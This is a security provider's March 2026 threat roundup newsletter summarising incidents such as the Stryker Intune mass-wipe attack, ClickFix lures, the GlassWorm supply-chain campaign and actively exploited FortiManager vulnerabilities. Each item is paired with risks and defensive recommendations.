Cybersecurity Roundup March 2026

From Kocho’s Security Operations Centre (SOC)

Published: 08 April 2026

March’s incidents highlight a common set of risks. Trusted access, management platforms and supply chains continue to offer high‑impact attack paths, while unpatched vulnerabilities and overlooked platform changes increase the blast radius when things go wrong.

Here’s the key threats and recommended actions identified by our SOC team this month.

Headlines:

Intune abuse wipes 200,000 devices in Stryker cyberattack
ClickFix social engineering bypasses defences without malware
GlassWorm turns stolen GitHub tokens into supply‑chain attacks
FortiManager vulnerabilities actively exploited in the wild
Update Secure Boot certificates to avoid risk ahead of June deadline
Protect against growing device code phishing threats

Stryker hit by large-scale cyberattack leveraging Microsoft Intune

On 11 March 2026, Stryker, a global medical technology manufacturer operating across healthcare systems worldwide, was hit by a destructive cyberattack attributed to the Iran‑linked hacktivist group Handala.

The attackers began by compromising an administrative identity, then escalated privileges and created a new Global Administrator account. Rather than deploying traditional malware, the group relied on living‑off‑the‑land techniques, abusing legitimate tools including PowerShell and, critically, Microsoft Intune.

They used Intune’s built‑in remote‑wipe functionality to erase over 200,000 devices across 79 countries, affecting corporate laptops, mobile devices and, in some cases, personal devices enrolled via Outlook. Stryker confirmed widespread operational disruption, including manufacturing shutdowns and large‑scale device outages, though it reported no impact to customers or partners and is continuing system restoration.

What are the risks?

A single privileged account can trigger organisation‑wide disruption without malware
Legitimate management platforms can become high‑impact attack tools if controls are weak
Device management can extend to personal or lightly governed devices, amplifying blast radius

Recommended actions:

Enforce MFA for all privileged accounts and implement just-in-time access via Privileged Identity Management.

Restrict and audit access to tools like Microsoft Intune. Require additional approvals for high-impact actions such as bulk device wipes.

Use EDR tools to monitor PowerShell and WMI activity and establish behavioural baselines.

Deploy endpoint protection against infostealers and monitor for leaked credentials on the dark web.

Centralise audit logging across Active Directory, Entra ID and endpoint management platforms.

ClickFix social engineering powers fileless ransomware attacks

Ransomware groups including LeakNet have been observed using the ClickFix social engineering technique as an initial access method, tricking users into manually executing malicious commands via the Windows Run dialog or terminal. The approach avoids exploiting software vulnerabilities, instead abusing trusted workflows and legitimate system tools to gain execution.

Recent campaigns deliver staged payloads directly into memory, leaving little artefact on disk and significantly reducing visibility for traditional security controls. Researchers report the technique is being delivered via compromised but legitimate websites and is now being adopted more broadly across ransomware and malware operations targeting both Windows and macOS environments.

What are the risks?

User‑executed commands can provide initial access without exploiting a vulnerability
Fileless, in‑memory execution reduces forensic visibility and detection
Trusted workflows and native tools are abused, bypassing many preventative controls
The technique is adaptable and has been observed across multiple platforms

Recommended actions:

Avoid copying and running commands from pop-ups, emails or websites unless you fully trust the source.

Train users to be wary of urgent or alarming messages prompting them to ‘fix’ an issue quickly.

Verify any unexpected instructions with your IT or security team before taking action.

Restrict use of administrative tools (Command Prompt, Run dialog) to authorised users only.

Ensure endpoint security software is capable of detecting suspicious behaviour.

GlassWorm weaponises GitHub tokens in supply‑chain attacks

An expanded GlassWorm campaign is compromising developer environments to steal GitHub tokens and inject malware directly into live repositories. Attackers force‑push obfuscated code into Python and JavaScript projects while preserving commit metadata, making the changes difficult to spot. Anyone installing affected packages or running compromised code triggers an in‑memory payload, enabling downstream compromise across software supply chains.

What are the risks?

Compromised developer accounts can propagate malware across dozens of downstream projects and their users
Force-pushed commits can be difficult to distinguish from legitimate updates without careful review
Transitive dependency infections are invisible to surface-level audits of direct dependencies

Recommended actions:

Install extensions and packages from trusted, verified sources only, carefully review updates and unexpected dependency changes.

Enable MFA on all development accounts and regularly rotate and secure tokens.

Monitor repositories for unusual commit activity, forced changes or unexpected new dependencies.

FortiManager under active attack (CVE-2024-47575, CVE-2025-54820)

A critical vulnerability affecting Fortinet FortiManager, tracked as CVE‑2024‑47575, is being actively exploited in the wild, allowing remote, unauthenticated attackers to execute arbitrary commands. Threat actors have been observed using automated tools to exfiltrate sensitive data from compromised systems, including administrative credentials, configuration files and IP inventories, enabling further compromise of downstream managed devices.

The UK National Cyber Security Centre has confirmed it is investigating multiple incidents, indicating the activity is ongoing and targeted rather than theoretical. A second flaw, CVE‑2025‑54820, affects the FortiManager fgtupdates service. While not yet observed in active exploitation, it still represents a viable remote execution risk in exposed environments if left unpatched.

What are the risks?

Unauthenticated Remote Code Execution (RCE) enabling full takeover of FortiManager instances
Theft of admin credentials, configs and network topology data, enabling broader compromise
Automated exploitation at scale, including targeted activity against UK organisations
Potential for remote code execution via the fgtupdates service (CVE‑2025‑54820)

Recommended actions:

Patch immediately, upgrade to FortiManager 7.4.3+ or 7.2.11+ or migrate away from unsupported 6.4 versions.

Disable the fgtupdates service to reduce exposure to CVE-2025-54820 where patching is delayed.

Conduct compromise assessments using vendor-provided IoCs. Assume credential exposure and reset all administrative credentials and API keys if compromise is suspected.

UK organisations should report suspected compromise to the NCSC.

Update Secure Boot certificates to avoid risk ahead of June deadline

Secure Boot certificates issued in 2011 begin expiring from June 2026. These certificates protect the early boot process by ensuring only trusted firmware and operating system components can run. Organisations should now confirm whether devices have received the updated 2023 certificates and understand the risks if they have not.

Microsoft is deploying updated certificates via Windows updates, but not all devices qualify. Some hardware requires OEM firmware updates before the new certificates can take effect.

What are the risks?

Loss of future Secure Boot protections
Increased exposure to boot‑level threats such as bootkits and rootkits
Compatibility issues with newer operating systems, firmware and boot components

Recommended actions:

Inventory devices to confirm certificate status before June 2026.

Keep Windows Update enabled.

Apply required OEM firmware (UEFI/BIOS) updates.

For Azure Virtual Desktop, update golden images and ensure Trusted Launch is enabled.

From our blog

How Device Code phishing reveals a critical identity blind spot

Device Code phishing is an increasingly common technique that abuses Microsoft’s legitimate Device Code Flow to gain access tokens without stealing a password. Because the sign-in page is genuine, the key risk is authorising a code you didn’t initiate.

Our latest security article breaks down how the attack works, why it creates a blind spot in modern identity security, and the steps organisations should take to reduce exposure and detect misuse.